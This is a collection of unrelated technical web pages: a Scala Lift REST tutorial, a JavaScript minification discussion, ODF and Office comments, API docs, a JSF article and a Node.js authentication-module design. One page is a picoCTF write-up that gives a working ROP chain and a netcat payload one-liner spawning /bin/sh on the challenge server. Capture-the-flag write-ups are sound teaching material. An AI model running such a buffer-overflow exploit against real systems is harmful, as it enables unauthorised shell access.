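    println(route(List("restapi", "game", "list")))       // all games
    println(route(List("restapi", "game", "list", "2")))  // game 2
  }
}
```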
The definition of the request handlers and its pattern matching is easy to understand and maintain, as shown in the following lines: serve { case "restapi" :: "game" :: "list" :: Nil Get _ => anyToJValue(listAllGames) case "restapi" :: "game" :: "list" :: AsLong(id) :: Nil Get _ => anyToJValue(listGame(id)) } Finally, it is necessary to make Lift include the GameRest object in the request processing pipeline. Thus, you must make a small change in Boot.scala. Just add the following import: import code.lib._ ... Then, add the following lines within the Boot.boot method: // Make Lift include the GameRest object in the request processing pipeline LiftRules.dispatch.append(GameRest) As you might notice, it isn't necessary to list the REST URLs in Lift's SiteMap. The simple REST API is ready to process requests. A request to restapi/game/list generates the response shown in the listing with all the games retrieved by the listAllGames method: [{ "id":1, "name":"Invaders 2013", "highestScore":7200 },{ "id":2, "name":"Candy Crush", "highestScore":32500 },{ "id":3, "name":"Angry Birds", "highestScore":155500 }] A request to restapi/game/list/2 results in a call to the listGame method with 2 as the id value. The following lines show the result: { "value":{ "id":2, "name":"Candy Crush", "highestScore":32500 } } A request to restapi/game/list/4 results in a call to the listGame method with 4 as the id value. There is no game that matches this id value; the following lines show the result: { "msg":"The requested game doesn't exist", "exception":{ }, "chain":{ } } Conclusion Lift has a very active community and it is worth taking a look at the modules it has written that provide extra features such as PayPal and OpenID integration. Before you start working on any integration or additional feature, check the modules the community has published. The Lift framework takes advantage of many helpful features in the Scala programming language, and the code is easy to read and maintain. 
Once you make the shift from MVC to Lift's ViewFirst model or after you work with a few REST APIs based on Lift, it is difficult to go back to MVC frameworks without missing the wonders of dozens of Lift's features. Gaston Hillar is a frequent contributor to Dr. Dobb's. Related Article Building Web Applications with Lift
http://www.drdobbs.com/cpp/logging-in-c/cpp/building-web-apps-with-lift-lazy-loading/240159513?pgno=3
In Python you indicate whether a function/method is private by naming it so that it starts with an _ underscore, like this: def _thisIsPrivate(): return 'a' def thisIsPublic(): return 'b' It means that if you have these two functions in a file called dummy.py and you do something like this: >>> from dummy import * >>> thisIsPublic() 'b' >>> _thisIsPrivate() Traceback (most recent call last): File "<stdin>", line 1, in ? NameError: name '_thisIsPrivate' is not defined Seems fair, doesn't it? Now, is there a similar naming convention and functionality in JavaScript? In many of my JavaScript files there will be functions with the same naming convention as Python, so that I can remember which functions might be used from outside and which are only relevant inside the module's scope. But that's just me, and I don't think it has an actual effect other than my personal naming convention taste. The reason I'm asking is that I want to improve my slimmer with the new --hardcore option. Last month I added that if you switch on --hardcore, it renames all function parameters from something like document_node to _1 and formname to _2. Now I want to do something similar to the function names too. So imagine going from: function addParameters(param1, param2) { return _fixParameter(param1) + _fixParameter(param2); } function subtractParameters(param1, param2) { return _fixParameter(param1) - _fixParameter(param2); } function _fixParameter(param) { return param.toUpperCase(); } to this much more whitespace-efficient result: function addParameters(_0,_1){return _a(_0)+_a(_1);} function subtractParameters(_0,_1){return _a(_0)-_a(_1);} function _a(_0){return _0.toUpperCase();} That's a bandwidth saving of 123 bytes, or 45%! Maybe have different 'hardcore' modes? --hardcore=1 would change local names and argument names, but --hardcore=2 would slim _-named functions. Or you could allow custom regexes for the functions to allow slimming. 
Since JavaScript has no notion of a module, there can be no "private" functions as used in your Python example (which aren't that private either: "from dummy import _thisIsPrivate; _thisIsPrivate()"). And I've never really seen functions beginning with underscores outside of OO-like programming (where technically private functions are possible). As for your slimmer: what about simply testing for the existence of a function of the slimmed name first? And for inspiration, you might want to have a look at other products with the same functionality. That's a very interesting read. I figured what one can do is to relabel all functions that are repeated by generating new code in the slimmer. So if you start with this code: function parseSomething(z) { ... } function foo(x, y) { return parseSomething(x) + parseSomething(y); } Then this can be revamped to this: function A(z) { ... } function foo(x, y) { return A(x) + A(y); } var parseSomething=A; Not a big saving, but at least something.
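For comparison, JavaScript can get genuinely private helper functions through closures rather than naming conventions. A minimal sketch, reusing the _fixParameter example from the post (the names are illustrative):

```javascript
// Module pattern: _fixParameter is captured in the closure and is
// unreachable from outside; only the returned methods are public.
var mathUtils = (function () {
  function _fixParameter(param) {
    return param.toUpperCase();
  }
  return {
    addParameters: function (a, b) {
      return _fixParameter(a) + _fixParameter(b);
    }
  };
})();

console.log(mathUtils.addParameters('a', 'b'));  // "AB"
console.log(typeof mathUtils._fixParameter);     // "undefined"
```

Note that a minifier is free to rename the closed-over _fixParameter, since nothing outside the closure can ever reference it by name.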
http://www.peterbe.com/plog/private-functions-javascript
PHPPowerPoint 0.1.0 was released last week, as an open-source PHP API for generating PPTX files. Mitch, there is no “filter” involved – it’s built-in support. What made you think that it’s a filter? (I can’t find any place I’ve ever used that word regarding our ODF support, but would be glad to correct it if I have.) Also, your claim that docx is a proprietary format is hard for me to understand. There are many implementers who have written code to generate DOCX files by working directly with the ECMA376 spec – in what sense are the resulting DOCX files proprietary? Regarding your questions: - as we read the specification, tables in presentations are not allowed in ODF 1.1 – that was added in ODF 1.2, which is not yet an approved or published standard - the tables issue was pretty thoroughly debated a couple of years ago during the DIS29500 process; Open XML has three table models, each optimized for a particular document type, and ODF uses a single table model across all document types - we store formulas in our own namespace; this is the only option available in any of the published versions of ODF. I will be writing about this in more detail in another post later this week. - the encryption approach used by our implementation of Open XML is documented at, and code samples are available at Your other comments seem to be more about OO’s plans than Office’s implementation, so I can’t add to those. Rob Weir posted on his blog a couple of days ago an Update on ODF Spreadsheet Interoperability. @dmahugh: reference to Office 97 installer: "additional file format filters" – if you think of a better shortcut term, please tell me :) ECMA376 relies upon but doesn't describe formats such as VML (although they are declared 'deprecated'), relies upon paper sizes internal to MS Office that it doesn't describe (non-compliant with ISO paper sizes), and relies upon non-standard leap years and date formats. 
Were it really open, it would have been accepted as-is by ISO, instead of being strongly edited (1,000 modifications required for 6,000 pages, published 8 months after it 'became a standard' instead of 6 weeks). And stop me if I'm wrong, but currently no Office version complies with ISO 29500:2008. About the rest of my comment, it was directed at Ian. About tables: yes, it was debated for DIS29500. However, I fail to see how ODF 1.1 can't accept tables in a presentation, as there are no differences between ODT, ODS, and ODP apart from the last letter: their XML manifests and contents are identical, so just as a text document can include a table, so can a presentation. Impress couldn't add a table to an ODF 1.1 presentation but KPresenter could, and so can OO.o 3, even when setting the ODF compliance to 1.0/1.1. ODF 1.1 thus supports tables in presentation documents. There is NO reason PowerPoint would scrap a table added to an ODF presentation, since the currently standardized format accepts it, except to artificially limit the export filter. It's not because a (now outdated) application didn't support that particular feature that it can't be done. Doug, I 100% agree with Rob that SP2 is a step BACKWARD on the road of interoperability. That's because it simply destroys the de facto interoperability that exists between all other suites - it creates spreadsheets that can be manipulated with MS Office ONLY. Of course, OpenFormula is not an official standard yet, but why has Microsoft chosen to break this de facto alignment? Hopefully, OpenFormula WILL BE an ISO standard in a few months. What then? How will you explain that to European countries that are now fully committed to ODF in their public administrations? In the short term, it will be good for Microsoft's business and monopoly. But in the medium and long term, it's suicidal. People - even non-technical - ARE INFORMED of your moves. We keep an eye on Microsoft... 
When I blogged about the release of SP2 with ODF support two weeks ago, I mentioned that I was planning
http://blogs.msdn.com/b/dmahugh/archive/2009/04/28/working-with-odf-in-word-2007-sp2.aspx?PageIndex=2
xmgetpostedfromwidget(3) [redhat man page]

XmGetPostedFromWidget(library call)

NAME
       XmGetPostedFromWidget -- A RowColumn function that returns the widget from which a menu was posted

SYNOPSIS
       #include <Xm/RowColumn.h>
       Widget XmGetPostedFromWidget(
       Widget menu);

PARAMETERS
       menu      Specifies the widget ID of the menu

       For a complete definition of RowColumn and its associated resources, see XmRowColumn(3).

RELATED
       XmRowColumn(3).
https://www.unix.com/man-page/redhat/3/XmGetPostedFromWidget/
FreeBASIC offers features similar in style to Delphi's Extended Types. Some of the other features include namespaces, function overloading, Unicode support, and variable and array initializers. FreeBASIC can create standalone executables, DLLs and libraries. GUI applications can be created using several GUI packages such as GTK and IUP, and by using the Windows API. Debugging support is provided with GDB or Insight. FreeBASIC has an extensive built-in graphics library that provides a number of graphics primitives, multi-buffer screen pages, direct access to the underlying screen pages, 8- to 32-bit color commands, BMP support, and OpenGL context creation. Portability FreeBASIC has
http://roguebasin.com/index.php/FreeBASIC
4.3: Identifier Names

An identifier is an arbitrarily long sequence of digits, underscores, lowercase and uppercase Latin letters, and most Unicode characters (see below for details). A valid identifier must begin with a non-digit character. Identifiers are case-sensitive (lowercase and uppercase letters are distinct), and every character is significant. There are certain rules that should be followed while naming C++ identifiers: - They must begin with a letter or underscore (_). Be aware that: - identifiers with a double underscore anywhere are reserved; - identifiers that begin with an underscore followed by an uppercase letter are reserved; - identifiers that begin with an underscore are reserved in the global namespace. - They must consist of only letters, digits, or underscores. No other special character is allowed. - They should not be keywords. - They must not contain white space. - They should be up to 31 characters long, as only the first 31 characters are significant. Beyond the language rules, there are conventions to follow: - make sure you are coding according to the standards your organization has in place; - CONSTANTS IN ALL UPPER CASE - not a requirement, but pretty much an industry-standard convention. Meaningful identifier names make your code easier for another to understand. After all, what does "p" mean? Is it pi, price, pennies, etc.? Thus do not use cryptic (look it up in the dictionary) identifier names. This has been discussed previously - you will lose points in my class if you use variables that are NOT meaningful. Some programming languages treat upper and lower case letters used in identifier names as the same. Be sure you know the coding requirements for whatever organization you are coding for. Definitions - reserved word - Words that cannot be used by the programmer as identifier names because they already have a specific meaning within the programming language. 
Adapted from: "C/C++ Tokens" by I.HARISH KUMAR, Geeks for Geeks "Identifiers" by Cubbi, cppreference.com "Identifier Names" by Kenneth Leroy Busbee, (Download for free at) is licensed under CC BY 4.0
https://eng.libretexts.org/Courses/Delta_College/C___Programming_I_(McClanahan)/04%3A_Data_and_Operators/4.03%3A_Identifier_Names
ButtonBase API API documentation for the React ButtonBase component. Learn about the available props and the CSS API. Import You can learn about the difference by reading this guide on minimizing bundle size. import ButtonBase from '@mui/material/ButtonBase'; // or import { ButtonBase } from '@mui/material'; ButtonBase contains as few styles as possible. It aims to be a simple building block for creating a button. It contains a load of style resets and some focus/ripple logic. Component name The name MuiButtonBase can be used when providing default props or style overrides in the theme.
https://mui.com/api/button-base/
Hacking Series Part 3 Challenge: Guessing Game 1 Category: binary exploitation We are given three files consisting of “vuln”, “vuln.c”, and “Makefile”. The binary vuln can be run and simulates a simple guessing game. From the source code given (vuln.c), we can see that if the correct number is guessed, the user can enter a name up to 360 characters long. We can also see that the buffer that stores this name is only 100 characters long, which means this program is vulnerable to a buffer overflow. The first thing to do is figure out a way to guess the “random” number successfully every time the program is run. In order to do this, I opened vuln in IDA to see if there are any patterns that appear to be manipulating the number that is used. In the function do_stuff, a function named get_random is called, which is where the random number is produced. The result from get_random is stored in rdi, then is incremented by 1. Instead of following each instruction to figure out what number is produced in the end, I opened vuln in gdb and set a breakpoint after the function get_random is called. Then, I looked inside rax to determine the number and also ran the program multiple times to see if this number changed. It turns out that the number generated from get_random is always 83. This number does not change with multiple instances of the program, which means it is predictable. As stated before, this number is incremented by 1, then compared to the inputted guess of the user to see if they are correct. So in the end, the number that needs to be guessed is always 84 on the first try. Next, since we guessed the number correctly, the program asks for our name. Since we can perform a buffer overflow here, we will need to determine the correct amount of padding needed to overwrite rip. After several attempts, I determined that the amount of padding needed is 120 characters. After this number, we reach rip and can now work on exploiting the buffer. 
Since we have over 200 characters of space left, we could easily store shell code in the rest of the buffer, then execute from the stack. However, by looking at the contents of Makefile, I saw that this is not possible: the stack is non-executable. This means that this will need to be a ROP-based attack instead. In order to spawn a shell, I decided to call execve with /bin/sh as the program to run. For the execve syscall, the registers need to be in the following states:

- rax = 59 (the syscall number for execve)
- rdx = 0 (address of the environment variables)
- rsi = 0 (address of the arguments)
- rdi = address of /bin/sh (path to the program to execute)

After this, we can call syscall to get a shell on the system and find the flag. In order to get the registers into this state, we need to identify the following gadgets:

pop rax ; ret
pop rsi ; ret
pop rdi ; ret
pop rdx ; ret
mov qword ptr [rsi], rax ; ret
syscall

There are mainly two stages to this ROP: the write stage and the execute stage. In the write stage, /bin/sh is stored at an empty data address in the binary so that it is easy to access later in the execute stage. This also makes the size of the shell code smaller. In the execute stage, the registers are set to the values they need to contain and execve is executed. Using ROPgadget, we can easily identify where these gadgets reside in the binary. Now that we know the address of each gadget, we can start writing instructions for the write stage. I did this in Python using some instructions provided by ROPgadget. Now, /bin/sh is stored at the address 0x00000000006ba160 after these instructions are executed (this being a 64-bit binary). Next, we move on to the execute stage. This executes execve and gives us a shell when completed. Putting these two stages together, we get the following script. 
from struct import pack

# write stage
p = pack('<Q', 0x4163f4)   # pop rax ; ret
p += b'/bin/sh\x00'
p += pack('<Q', 0x410ca3)  # pop rsi ; ret
p += pack('<Q', 0x6ba160)  # empty data address that I want /bin/sh to be in
p += pack('<Q', 0x47ff91)  # mov qword ptr [rsi], rax ; ret

# execute stage
p += pack('<Q', 0x400696)  # pop rdi ; ret
p += pack('<Q', 0x6ba160)  # empty data address that /bin/sh is in
p += pack('<Q', 0x410ca3)  # pop rsi ; ret
p += pack('<Q', 0x0)       # arguments
p += pack('<Q', 0x44a6b5)  # pop rdx ; ret
p += pack('<Q', 0x0)       # environment variables
p += pack('<Q', 0x4163f4)  # pop rax ; ret ; pops 59 into rax
p += pack('<Q', 0x3b)      # 59
p += pack('<Q', 0x40137c)  # syscall

print(p)

This also prints the resulting shell code bytes so that they can be used in the payload to the server. The payload needs to include the number to guess, the padding, and the shell code. In order to return input back to the user to actually interact with the shell once it is spawned, we also need to include the cat command. The entire payload then needs to be piped to the server, which we can connect to using netcat. In order to make sure the bytes are interpreted properly, we can use Python to print them. Python can also be used to print 84 (the number that needs to be guessed) before the shell code is inserted. As a result, the payload looks like this.

( python -c 'print(84)' ; python -c 'print("a"*120+"\xf4cA\x00\x00\x00\x00\x00/bin/sh\x00\xa3\x0cA\x00\x00\x00\x00\x00`\xa1k\x00\x00\x00\x00\x00\x91\xffG\x00\x00\x00\x00\x00\x96\x06@\x00\x00\x00\x00\x00`\xa1k\x00\x00\x00\x00\x00\xa3\x0cA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb5\xa6D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf4cA\x00\x00\x00\x00\x00;\x00\x00\x00\x00\x00\x00\x00|\x13@\x00\x00\x00\x00\x00")' ; cat ) | nc jupiter.challenges.picoctf.org 39940

After listing the files found on the server, I used cat to see the contents of flag.txt. I found the following flag.

picoCTF{r0p_y0u_l1k3_4_hurr1c4n3_8cd37a0911d46b6b}
https://alisyakainth.medium.com/hacking-series-part-3-ba08e83989b6
How can I get the name of a node used? I want to get its name by string

out of curiosity, what do you plan on doing with this bit of information? Have you tried anything? The name is stored in the .dyn file, so the simple route would be to read the file as text and parse the data you want from there.

I do not want to write it manually as a string. My end goal is to export this data to Excel.

This will do it for DynamoRevit: import clr # Adding the DynamoRevitDS.dll module to work with the Dynamo API clr.AddReference('DynamoRevitDS') import Dynamo # access to the current Dynamo instance and workspace dynamoRevit = Dynamo.Applications.DynamoRevit() currentWorkspace = dynamoRevit.RevitDynamoModel.CurrentWorkspace nodeNames = [] for i in currentWorkspace.Nodes: nodeNames.append(i.Name) OUT = nodeNames

Many thanks @john_pierson, that is what I was looking for. Specifically, I want to get the names of the nodes fed into the Python Script node as inputs.
https://forum.dynamobim.com/t/get-the-name-of-a-node/68019
Besides a properties file per locale, we can also use a class – which can give some control over the encoding and special characters in messages and/or where to retrieve the messages from (for example, a database). The properties file in this case is extremely simple: title=The Interesting World of Internationalization formSubmit=Apply Changes if you like ageCategorySelector=Select Age Category The very simple JSF page looks like this: ... <f:view> <html> ... <body> <h:form> <h:panelGrid ...> <h:outputText .../> <h:commandButton .../> </h:panelGrid> </h:form> </body> </html> </f:view> Note the references to i18n-ed messages using EL expressions of the format #{msg['key']} – no fiddling at all. The configuration of our managed beans – note there are two beans, one to implement Map and intercept the message request (MessageProvider) – we have hijacked the msg name for our MessageProvider, so we should register the Resource Bundle itself under a different name. <application> <resource-bundle> <base-name>nl.amis.appBundle</base-name> <var>msgbundle</var> </resource-bundle> </application> The implementation of the MessageProvider class is very simple – it passes the request onwards to the MessageManager: package nl.amis; import java.util.HashMap; public class MessageProvider extends HashMap{ private MessageManager msgMgr; public MessageProvider() { } @Override public Object get(Object key) { return msgMgr.getMessage((String)key); } public void setMsgMgr(MessageManager msgMgr) { this.msgMgr = msgMgr; } public MessageManager getMsgMgr() { return msgMgr; } } The references in the JSF pages can all stay the same: it makes no difference whether the EL expression in the page references the Resource Bundle registered with JSF directly or a managed bean like we do here. Now for the MessageManager. 
The initial implementation that proves our interception mechanism works but does no manipulation looks like this: public class MessageManager { public String getMessage(String key) { // use standard JSF Resource Bundle mechanism return getMessageFromJSFBundle(key); // use the default Java ResourceBundle mechanism // return getMessageFromResourceBundle(key); } private String getMessageFromResourceBundle(String key) { ResourceBundle bundle = null; String bundleName = "nl.amis.appBundle"; } private String getMessageFromJSFBundle(String key) { return (String)resolveExpression("#{msgbundle['" + key + "']}"); } public static ClassLoader getCurrentLoader(Object fallbackClass) { ClassLoader loader = Thread.currentThread().getContextClassLoader(); if (loader == null) loader = fallbackClass.getClass().getClassLoader(); return loader; } // from JSFUtils in Oracle ADF 11g Storefront Demo); } } We can choose between two ways to access the Resource Bundle. One is using the JSF mechanism directly – which will only work for Resource Bundles that are explicitly registered with JSF in faces-config.xml files. See method getMessageFromJSFBundle. The other one goes around whatever facilities JSF offers and uses the standard Java ResourceBundle library directly. With this approach, we have to find out the Locale ourselves. We can use this approach with any resource bundle file on the classpath, without them having been explicitly registered in faces-config.xml. This approach is used in getMessageFromResourceBundle(). Enter the Context that should influence the Resource Bundle results At this point the extra context enters the picture. For simplicity's sake, we will assume the context to be indicated by a property on a session-scoped managed bean. The context can be set using a List control in the user interface (typically this would be handled in a more subtle way). The MessageManager bean is extended with the ageCategory property and a getter and setter method. 
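The context-sensitive lookup this builds toward can be sketched independently of JSF with a plain ResourceBundle: try a context-suffixed key first and fall back to the base key. The class and the in-memory bundle below are illustrative, not part of the article's download:

```java
import java.util.ListResourceBundle;
import java.util.ResourceBundle;

public class ContextMessageManager {
    private final ResourceBundle bundle;
    private String ageCategory = "senior";   // the context property

    public ContextMessageManager(ResourceBundle bundle) {
        this.bundle = bundle;
    }

    public void setAgeCategory(String ageCategory) {
        this.ageCategory = ageCategory;
    }

    // Try "key_context" first; fall back to the plain key.
    public String getMessage(String key) {
        String contextKey = key + "_" + ageCategory;
        return bundle.containsKey(contextKey)
                ? bundle.getString(contextKey)
                : bundle.getString(key);
    }

    public static void main(String[] args) {
        // In-memory stand-in for the appBundle properties file.
        ResourceBundle demo = new ListResourceBundle() {
            protected Object[][] getContents() {
                return new Object[][] {
                    { "title", "The Interesting World of Internationalization" },
                    { "title_senior", "The never ending wonders of the World of Internationalization" },
                };
            }
        };
        ContextMessageManager mgr = new ContextMessageManager(demo);
        System.out.println(mgr.getMessage("title"));  // senior variant
        mgr.setAgeCategory("junior");
        System.out.println(mgr.getMessage("title"));  // falls back to the base key
    }
}
```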
The JSF page is extended with the list control – that for some weird reason does not get its labels from the resource bundle: <h:selectOneListbox ...> <f:selectItem .../> <f:selectItem .../> </h:selectOneListbox> Now we can set the context. Question is: what difference does it make? Or better yet: how can we have it make a difference? When the user toggles from Senior to Junior age category, what should be the effect on the text in the page? Basically there are two ways to handle this. One is to add additional keys to the resource bundle; these keys are composed of the original (base) key and an identification of the context in which the key applies. For example: title=The Interesting World of Internationalization formSubmit=Apply Changes if you like ageCategorySelector=Select Age Category title_senior=The never ending wonders of the World of Internationalization formSubmit_senior=Notify the application of your desires by pressing this button title_junior=Speaking your own language ageCategorySelector_junior=Pick your own age peer group The lookup chain can be as long as you like: junior_christmas_male_brandX_page1Title, christmas_male_brandX_page1Title, male_brandX_page1Title, brandX_page1Title, pageTitle1. Run the page; select Senior and press the button: Then select Junior and press the button: Resource Bundle per context value Instead of adding context-suffixed keys, we can register a Resource Bundle per context value: <resource-bundle> <base-name>nl.amis.appBundle</base-name> <var>msgbundle</var> </resource-bundle> <resource-bundle> <base-name>nl.amis.appBundleJunior</base-name> <var>juniormsgbundle</var> </resource-bundle> Resources Download the JDeveloper 11g Application with the code for this article: jsfresourcebundletest.zip. 3 thoughts on “Context Sensitive Resource Bundle entries in JavaServer Faces applications – going beyond plain language, region & variant locales” Nice example. I have tried writing it twice and I still get "Resource bundle is immutable". Is there a way around that one? Thanks I re-wrote this program and I got the error: "ResourceBundles are immutable". Is there a way to fix this? Thanks ceyesuma Excellent work! 
Another example of the importance of extensibility in the design of a standard. Stay tuned for JSF 2.0 – please check for links to the latest specs and implementation! Ed Burns (JSF co-spec lead)
https://technology.amis.nl/it/context-sensitive-resource-bundle-entries-in-javaserver-faces-applications-going-beyond-plain-language-region-variant-locales/
public static class ImportCustomContentRequest.Builder
extends Object
implements BmcRequest.Builder<ImportCustomContentRequest,InputStream>

Methods inherited from class java.lang.Object: clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait

public ImportCustomContentRequest.Builder invocationCallback(Consumer<javax.ws.rs.client.Invocation.Builder> invocationCallback)
Set the invocation callback for the request to be built.
Parameters: invocationCallback - the invocation callback to be set for the request

public ImportCustomContentRequest.Builder retryConfiguration(RetryConfiguration retryConfiguration)
Set the retry configuration for the request to be built.
Parameters: retryConfiguration - the retry configuration to be used for the request

public ImportCustomContentRequest.Builder copy(ImportCustomContentRequest o)
Copy method to populate the builder with values from the given instance.
Specified by: copy in interface BmcRequest.Builder<ImportCustomContentRequest,InputStream>
Parameters: o - other request from which to copy values

public ImportCustomContentRequest build()
Build the instance of ImportCustomContentRequest as configured by this builder.
Specified by: build in interface BmcRequest.Builder<ImportCustomContentRequest,InputStream>

public ImportCustomContentRequest.Builder body$(InputStream body)
Alternative setter for the body parameter.
Specified by: body$ in interface BmcRequest.Builder<ImportCustomContentRequest,InputStream>
Parameters: body - the body parameter

public ImportCustomContentRequest.Builder namespaceName(String namespaceName)
The Logging Analytics namespace used for the request.
Returns: this.

public ImportCustomContentRequest.Builder importCustomContentFileBody(InputStream importCustomContentFileBody)
The file to upload which contains the custom content.
Returns: this.

public ImportCustomContentRequest.Builder isOverwrite(Boolean isOverwrite)
A flag indicating whether or not to overwrite existing content if a conflict is found during the import content operation.
Returns: this.

public ImportCustomContentRequest.Builder opcRequestId(String opcRequestId)
The client request ID for tracing.
Returns: this.

public ImportCustomContentRequest buildWithoutInvocationCallback()

public String toString()
Overrides: toString in class Object
https://docs.oracle.com/en-us/iaas/tools/java/2.7.1/com/oracle/bmc/loganalytics/requests/ImportCustomContentRequest.Builder.html
When you develop a web application in Node.js®, you realize that the easiest way is to use Express. Express supports several plugins (such as session, etc.). However, if some pages in your application are secured and authentication is required, Express gives you very little regarding authentication. And if we are mentioning authentication, we should also point out that a user should be able to self-enroll (register). Similarly, if the user forgets his password, or wants to change it, the application should help him here as well. I call these flows “authentication flows”. Every secured web application should support these flows unless it delegates authentication to a third party (such as OAuth 2.0), so the same code ends up being written again and again. If you develop several secured web apps, you may find yourself copy-pasting the code from one app to another. And if you find a bug in your implementation, you have to fix it in all the applications. I thought of writing a package that can be reused, so any secured web application can add this package as a dependency, and bam – all the flows mentioned above are implemented, with a minimal set of configurations. This way, developers can concentrate on developing the core of their app, instead of messing around with flows that are definitely not the core of their business. I call this module the ‘authentication flows module’, or AFM in short. First off, I assume that the application uses what is called a “local strategy”, which means the application manages its own usernames and passwords. No OAuth, no cloud solutions like AWS Cognito, etc. Second, I assume that the hosting web app is Express-based. After the app initializes Express (including body-parser and express-session), it passes it to the AFM, so the AFM adds endpoints to it. Thus, the application supports endpoints like /login, /createAccount, /forgotPassword, and so on.
Third, it is reasonable to assume that the application has its own UI – each app wants its pages to maintain the same look and feel, and this includes the login page, the create-account page, and so on. One application might use ejs, a second application may use simple HTML/CSS, a third React, and so on. Thus, the AFM, which implements the backend part, must be totally decoupled from the UI. Fourth, the AFM sends emails to the user: verification emails, unlock-account emails and restoration (forgot password) emails. Each application manages its own way of sending emails. Perhaps the hosting application sends emails in its own logic, so it should reuse the same email server. In other cases, the hosting application might prefer to work with a specific provider like Google, mailgun or just an SMTP server like SMTP2GO. The AFM should be flexible enough to support all these cases. In these emails, a link is sent to the user. This link should expire after a pre-configured time and should be valid only once. Fifth, each application uses a different repository (or repositories). One approach could be that the AFM chooses a repo implementation – mongoDB, for instance – and stores the data there. But the downside is that it forces all hosting applications to use mongoDB. What happens if some app does not want to, or cannot, use mongoDB? Therefore, the AFM should be flexible enough to support different repository implementations. Sixth, the AFM should be as extensible as it can be. It will expose endpoints to the hosting application so some parts can be extended. For example, if the hosting application allows emails (usernames) only from a specific domain, the AFM will expose an API that can be implemented and executed during the create-account flow. Security. Security. Security. The AFM stores user information (encoded credentials, etc.) with your data, in your storage solution. It accesses it using the repository layer with the API (interface).
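The idea of handing the host's Express app to the module so it can register its own routes can be sketched roughly like this. This is an illustrative stand-in, not the module's real internals: `AppLike` replaces a real Express app (so the sketch runs without Express installed), and `addAuthEndpoints` plays the role of the module's registration step.

```typescript
// Minimal sketch of how a module can add endpoints to a host app's server.
// Only the methods we use are declared on AppLike.
interface AppLike {
  post(path: string, handler: (req: any, res: any) => void): void;
}

// Hypothetical registration function, in the spirit of authFlows.config():
function addAuthEndpoints(app: AppLike): void {
  app.post('/createAccount', (req, res) => res.send('account created'));
  app.post('/login', (req, res) => res.send('logged in'));
  app.post('/forgotPassword', (req, res) => res.send('restore mail sent'));
}

// A toy "app" that just records which routes were registered:
const routes: string[] = [];
const fakeApp: AppLike = { post: (path, _handler) => { routes.push(path); } };
addAuthEndpoints(fakeApp);
console.log(routes.join(','));
```

With a real Express app, the same `addAuthEndpoints(app)` call would attach working handlers, which is exactly the "pass your server object in" contract described above.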
The hosting application decides which repo it uses, and it needs to use the implementation for that repo. For example, if the hosting application uses SQL, it can use the existing implementation for SQL. If it uses a repo which does not currently have an implementation (such as CouchDB or Cassandra), it must implement the interface for that repo. A default in-memory implementation is supplied (mainly for testing). The easiest and most compact solution would be to develop implementations for all repos in the AFM itself, but this solution would end up as a super-heavy module, dependent on the clients of all the repos. For example, to support SQL, elasticsearch and mongoDB, the AFM would have to include, in its package.json, the mongoDB client, the SQL client, and so on. Another drawback is that if we find a bug in one of the implementations, we have to issue a new version of the whole AFM with that fix. Our approach is to issue a separate module for each implementation. Thus, there is a module for the in-mem implementation, another for mongoDB, and so on. This way, the AFM itself is more robust and totally decoupled from the repo implementation, it is more lightweight, and each implementation is independent of the others. Therefore, the hosting app has to depend on the AFM plus the repo implementation that it uses.

import { AuthenticationUser } from "../..";

export interface AuthenticationAccountRepository {

    loadUserByUsername(email: string): Promise<AuthenticationUser>;

    /**
     * Create a new user with the supplied details.
     */
    createUser(authenticationUser: AuthenticationUser): void;

    /**
     * Remove the user with the given login name from the system.
     * @param email
     */
    deleteUser(email: string): void;

    /**
     * Check if a user with the supplied login name exists in the system.
     */
    userExists(username: string): Promise<boolean>;

    setEnabled(email: string);
    setDisabled(email: string);
    isEnabled(email: string): Promise<boolean>;

    // boolean changePassword(String username, String newEncodedPassword);

    /**
     * @param email
     */
    decrementAttemptsLeft(email: string);
    setAttemptsLeft(email: string, numAttemptsAllowed: number);

    /**
     * sets a password for a given user
     * @param email - the user's email
     * @param newPassword - new password to set
     */
    setPassword(email: string, newPassword: string);

    getEncodedPassword(username: string): Promise<string>;
    getPasswordLastChangeDate(email: string): Promise<Date>;

    setAuthority(username: string, authority: string);

    // LINKS:
    addLink(username: string, link: string);

    /**
     * @param username - the key in the map to whom the link is attached
     * @return true if the link was found (and removed), false otherwise.
     */
    removeLink(username: string): Promise<boolean>;

    getLink(username: string): Promise<{ link: string, date: Date }>;

    /**
     * @param link
     * @throws Error if the link was not found for any user
     */
    getUsernameByLink(link: string): Promise<string>;
}

After user registration, the AFM sends a verification email to the user. In another use-case, if the user forgets his password, the AFM sends a link to the registered email, to verify it is him. In yet another use-case, the account is locked when the allowed number of login attempts is exceeded. There are many ways to send emails, and each application can choose its preferred way. nodemailer is a convenient way to send emails, but you need to configure a provider (Google, Microsoft, etc.). SMTP2GO is an example of such a provider. Another email option is mailgun, which allows you to send email using their API (and not only SMTP). The AFM lets the hosting application decide how it sends emails. By default, the AFM uses nodemailer over SMTP2GO, but the hosting application can implement the MailSender interface and provide its own implementation for sending emails.
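A custom MailSender implementation can be sketched as follows. The interface shape here is an assumption (a single sendEmail method taking recipient, subject and body); the real module's signature may differ. Instead of a real provider, this sketch just captures outgoing mails, which is also a handy pattern for testing.

```typescript
// Assumed shape of the MailSender extension point (may differ from the module):
interface MailSender {
  sendEmail(recipient: string, subject: string, body: string): Promise<void>;
}

// A capturing implementation: records mails instead of sending them.
class CapturingMailSender implements MailSender {
  public sent: { recipient: string; subject: string; body: string }[] = [];

  async sendEmail(recipient: string, subject: string, body: string): Promise<void> {
    // a real implementation would call nodemailer / mailgun / an SMTP server here
    this.sent.push({ recipient, subject, body });
  }
}

const sender = new CapturingMailSender();
void sender.sendEmail("user@example.com", "Account activation",
                      "https://host/activate/abc123");
console.log(sender.sent.length); // prints 1
```

The hosting application would pass such an object to the AFM's configuration so every flow (activation, unlock, forgot password) goes through it.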
